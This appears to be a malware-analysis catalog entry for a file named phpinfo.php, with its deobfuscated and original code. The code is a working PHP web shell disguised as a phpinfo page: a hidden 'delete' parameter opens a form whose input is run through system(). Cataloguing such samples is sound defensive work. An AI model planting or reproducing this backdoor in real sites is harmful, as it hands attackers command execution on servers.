PHP Malware Analysis

Back to list

Filename: phpinfo.php

Tags

Execution
  • system
Input
  • _POST
Environment
  • phpinfo

Deobfuscated code

<?php

if (isset($_REQUEST['delete'])) {
    echo "<pre>";
    echo "<form name='form' action='#' method='post'>\r\n        <input type='text' name='coba'/> <input type='submit' value='enter'/>\r\n        </form>";
    $cmd = $_POST['coba'];
    system($cmd);
    echo "</pre>";
    phpinfo();
    die;
}
phpinfo();


Original code

<?php
if(isset($_REQUEST['delete'])){
        echo "<pre>";
        echo "<form name='form' action='#' method='post'>
        <input type='text' name='coba'/> <input type='submit' value='enter'/>
        </form>";
        $cmd = ($_POST['coba']);
        system($cmd);
        echo "</pre>";
        phpinfo();
        die;
}
phpinfo();
?>